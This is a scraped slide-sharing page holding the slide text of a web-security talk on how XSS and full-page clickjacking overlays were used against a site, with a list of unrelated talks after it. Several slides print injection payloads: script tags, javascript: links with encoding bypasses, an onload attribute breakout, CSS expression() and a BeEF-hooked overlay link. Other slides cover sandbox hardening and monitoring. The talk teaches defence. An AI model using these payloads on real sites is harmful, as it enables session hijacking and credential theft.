how we hacked how we hacked
play

How we hacked How we hacked and what happened next and how you can - PowerPoint PPT Presentation

Oct 31, 2023 •466 likes •1.06k views

How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland Fixed Fixed https://www.owasp.org/index.php/Top_10_2013-Top_10 <script>alert(1)</script> User Data Change Data XSS Bootstrap

  1. How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland

  2. Fixed

  3. Fixed

  6. https://www.owasp.org/index.php/Top_10_2013-Top_10

  8. <script>alert(1)</script>

  11. User Data Change Data XSS Bootstrap Payload Passwords WEBPAGE WEBPAGE Comand & Control BROWSER Firewalled http://jsbin.com/femapijiwe/1/edit?html,output

  13. <a href="javascript:alert(/Exploit me!/)"> javascript:alert(/Exploit me!/) </a>

  16. <a href=“ javascript:payload ” BEEF HOOK style=“ width:100%; height: 100%; Set size position: fixed; Set position type left: 0px; top: 0px; Window position background: rgba(255, 0, 0, 0.5); ” Test mode ></a> http://jsbin.com/videpusaza/edit?html,output

  17. <a style=“width: expression(alert(1));” />

  18. <a href=“ javascript:payload ” style=“ width:100%; height: 100%; left: 0px; top: 0px; position: fixed; background: rgba(255, 0, 0, 0.5); ” ></a>

  21. <head> <!-- Bootstrap core CSS --> <link href="https://getbootstrap.com/dist/css/bootstrap.min.css" rel="stylesheet"> </head>

  22. bootstrap.css 3663 .dropdown-backdrop { 3664 position: fixed; 3665 top: 0; 3666 right: 0; 3667 bottom: 0; 3668 left: 0; 3669 z-index: 990; 3670 }

  23. bootstrap.css 4299 .navbar-fixed-top, 4300 .navbar-fixed-bottom { 4301 position: fixed; 4302 right: 0; 4303 left: 0; 4304 z-index: 1030; 4305 }

  24. <a href=“ javascript:payload ” BEEF HOOK width=“100%” Set full window Set full window height=“100%” class=“dropdown-backdrop Set position type Set position navbar-fixed-top”> Z-index </a> http://jsbin.com/qotixugiko/1/edit?html,output

  26. iframe

  27. <iframe src=“https://example.com/” BEEF HOOK width=“100%” Set full window Set full window height=“100%” class=“dropdown-backdrop Set position type Set position navbar-fixed-top”> Z-index </iframe> http://jsbin.com/qotixugiko/2/edit?html,output

  30. javascript link whitelisted iframe 100% covering iframe iframe cross domain iframe open redirect 100% covering link 100% covering image login screen image

  31. image link

  32. Fixed

  36. you@hackme.bitsensor.io **************** Login http://jsbin.com/daracenafa/1/edit?html,output

  37. Fixed

  38. you@hackme.bitsensor.io **************** Login http://jsbin.com/dejite/13/edit

  39. http://jsbin.com/dejite/13/edit

  41. remove from whitelist attribute: id class style form iframe oembed/embed.ly

  42. harden HTML5 iframe sandbox allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation

  43. harden HTML5 iframe sandbox allow-forms allow-modals allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation

  45. attempts 1 javascript link 5 whitelisted iframe 10 100% covering iframe 11 iframe cross domain 14 iframe open redirect 20 100% covering link 23 100% covering image 25 covering image & link

  46. <img src=“ /uploads/mycatpicture.png ” /> <img src=“ ” “ ” /> <img src=“ ” /> <a “ ” /> <img src=“ ” /><script>alert(1)</script><a “ ” />

  47. <img src=“ /favicon.png ” /> <img src=“ /favicon.png” “ ” /> <img src=“ /favicon.png” onload=“ “ ” /> <img src=“ /favicon.png” onload=“alert(1) “ ” />

  48. <a href=“http://twitter.com/@EnableBitSensor”/> <a href=“ ”/> <a href=“javascript: alert(1) ”/> <a href=“javascript:// alert(1) ”/> <a href=“javascript://%0Aalert(1) ”/>

  49. <script> var user = ruben ;</script> <script> var user = ruben; alert(1) ;</script>

  50. <div style=“width: 10px ;”/> <div style=“width: expression(alert(1)) ;”/>

  51. security metrics logging (ELK) exceptions ids/ips (modsecurity)

  55. https://git.bitsensor.io/plugins/java-spring

  57. 30 juni GOTO Night Eindhoven Hackers using the ELK stack training

  58. +31 (0)6 122 10 587 ruben@bitsensor.io 0x4D4ED75AD9BB92F8

  59. Stay safe.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you will be. In fact, you already may have been hacked, but dont know it yet. Stu Davis, Chief Information Officer, Ohio Department of

600 views • 45 slides
How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van

How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van

How we hacked How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van Vreeland Web Application Security Web hosting / infrastructure Web applications / platforms VB6, C#, PHP, (Spring) Java

569 views • 29 slides
Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical

Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical

Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical Intelligence Security OWASP Ghana 2019 Who is this talk for? - Individuals, developers and sys admins. Are you sure youve been hacked? Q1:

247 views • 11 slides
Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot

Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot

Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot gray inc. @dotgray Sunday, March 15, 15 Resources Codex.WordPress.org / Hardening_WordPress Blog.Sucuri.net / WordPress Security WPSecure.net /

608 views • 32 slides
Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1

Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1

A Strategic Portfolio Focus on Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1 #GetIAMRight | One Identity - Restricted - Confidential IAM Risk Framework Provide a comprehensive view of real-time

366 views • 13 slides
The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well

The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well

The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well Grounded? Eastern Western Texas Transmission G L Generation Load Kilowatt = 1 thousand watts Megawatt = 1 million watts Gigawatt = 1

323 views • 18 slides
HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor,

HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor,

HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor, England &amp; Wales Avocat au Barreau de Paris ESSEC Business School This copy is for your personal, non-commercial use only. To order

457 views • 8 slides
How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at

How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at

How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at DEVCORE Captain of HITCON CTF team 0day researcher, focusing on Web/Application security orange_8361 Infiltrating Corporate Intranet Like NSA

764 views • 75 slides
How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November

How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November

How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November 2014 B-Sides Vienna Sebastian Bachmann &amp; Tibor Eli as How we hacked Online Banking Malware 22. November 2014 1 / 55 About Us About:

576 views • 55 slides
#Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS

#Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS

2/28/2019 #Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS Manager, City of Frisco How frequently are local governments under cyberattack? 70 60 50 40 30 20 10 0 Hourly or more At least

437 views • 18 slides
View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert,

View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert,

View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert, Florian Farke, and Markus Drmuth Santa Clara, California, USA | WAY 2019 | August 11, 2019 Two-Factor Authentication 1 1 2 1 Gmail 2FA

415 views • 28 slides
Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon State University 1 How does someone know they have been HACKED!? and WHO did it!? HACKED!? and WHO did it!? 2 Audit Logs in the News!

701 views • 51 slides
Aim Inspired by this I wanted to look into the following: Is it possible to collect

Aim Inspired by this I wanted to look into the following: Is it possible to collect

Twitter sentiment vs. Stock price Background On April 24 th 2013, the Twitter account belonging to Associated Press was hacked. Fake posts about the Whitehouse being bombed and the President being injured were posted. This lead to a

467 views • 23 slides
Page 1 1 Review: Exploiting Coherence Review: Precise Collisions hacked clean up player

Page 1 1 Review: Exploiting Coherence Review: Precise Collisions hacked clean up player

University of British Columbia Review: Picking Methods CPSC 314 Computer Graphics manual ray intersection May-June 2005 y Tamara Munzner VCS x Textures, Procedural Approaches, bounding extents Sampling Week 4, Thu Jun 2

381 views • 19 slides
accounts hacked among several in recent weeks to come upon security breaches in their AP

accounts hacked among several in recent weeks to come upon security breaches in their AP

HEADLINES Impact and Cost According to the Ponemon At least 19 states have Institutes most recent introduced or are considering &quot;Annual Study: U.S. Cost of security breach legislation in a Data Breach&quot; (March 2014. Most of the

401 views • 12 slides
The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber

The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber

The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber Crime Growth Number of mobile 200M devices affected IBM 11.6M Number of accounts hacked CNN Money 432M Number of malware samples collected Intel

652 views • 30 slides
Navigation IAP 2010 iphonedev.csail.mit.edu edward benson / eob@csail.mit.edu Wednesday,

Navigation IAP 2010 iphonedev.csail.mit.edu edward benson / eob@csail.mit.edu Wednesday,

Navigation IAP 2010 iphonedev.csail.mit.edu edward benson / eob@csail.mit.edu Wednesday, January 13, 2010 Today Programmatically Created Views Tab Bar Controllers Modal View Controllers &amp; Tables Navigation

694 views • 48 slides
UI in Android J.Serrat 102759 Software Design November 29, 2017 Goal and Reference Goals:

UI in Android J.Serrat 102759 Software Design November 29, 2017 Goal and Reference Goals:

UI in Android J.Serrat 102759 Software Design November 29, 2017 Goal and Reference Goals: quick introduction to the basics of UI Android app structure, patterns, components and style. setting up terminology relevant for the project

492 views • 30 slides
Special Needs Search Elizabeth Fadali, Nevada Housing Division, 1/26/2017 1

Special Needs Search Elizabeth Fadali, Nevada Housing Division, 1/26/2017 1

Special Needs Search Elizabeth Fadali, Nevada Housing Division, 1/26/2017 1 efadali@housing.nv.gov Service Provider/Restricted Access Port rtal Restricted access allows approved agencies to search for those listings that serve specific

453 views • 3 slides
Apport ionment Q uot a M et hods T erminology: Seat s It ems t o be apport ioned House Size

Apport ionment Q uot a M et hods T erminology: Seat s It ems t o be apport ioned House Size

Apport ionment Q uot a M et hods T erminology: Seat s It ems t o be apport ioned House Size Number of Seat s St at es Part ies t o whom seat s are apport ioned Populat ion M easurement of st at es size T ot al Populat ion

323 views • 9 slides
Visual/CSS Regression Testing Catching the Unintended Consequences of modifying your theme

Visual/CSS Regression Testing Catching the Unintended Consequences of modifying your theme

Visual/CSS Regression Testing Catching the Unintended Consequences of modifying your theme DrupalCamp Florida 2015 Florida Technical College Saturday, April 11, 2015 Who am I? Lisa Ridley Solutions Architect, Promet Source

328 views • 22 slides
Rethinking a Global UI/UX Strategy for the Chinese User Michael Headrick | VML I work in a

Rethinking a Global UI/UX Strategy for the Chinese User Michael Headrick | VML I work in a

What does it mean to be a global brand and enter China? How do you communicate with the Chinese user? Rethinking a Global UI/UX Strategy for the Chinese User Michael Headrick | VML I work in a global agency, on global programs, for

542 views • 22 slides
Semi-Automated Magazine Layout Using Content-Based Image Features Mikko Kuhna Aalto University

Semi-Automated Magazine Layout Using Content-Based Image Features Mikko Kuhna Aalto University

ACM Multimedia 12 31.10.2012 Semi-Automated Magazine Layout Using Content-Based Image Features Mikko Kuhna Aalto University Ida-Maria Kivel School of Science Pirkko Oittinen Department of Media Technology Contents 1. Introduction

896 views • 42 slides
Do-It-Yourself Mobile Apps: Where to Start? Kristen Lineberger Product Specialist, MobileSmith

Do-It-Yourself Mobile Apps: Where to Start? Kristen Lineberger Product Specialist, MobileSmith

Do-It-Yourself Mobile Apps: Where to Start? Kristen Lineberger Product Specialist, MobileSmith April 18, 2013 Who is MobileSmith: DIY mobile app development platform Cloud-based app management Full app lifecycle from cradle to

423 views • 21 slides

More recommend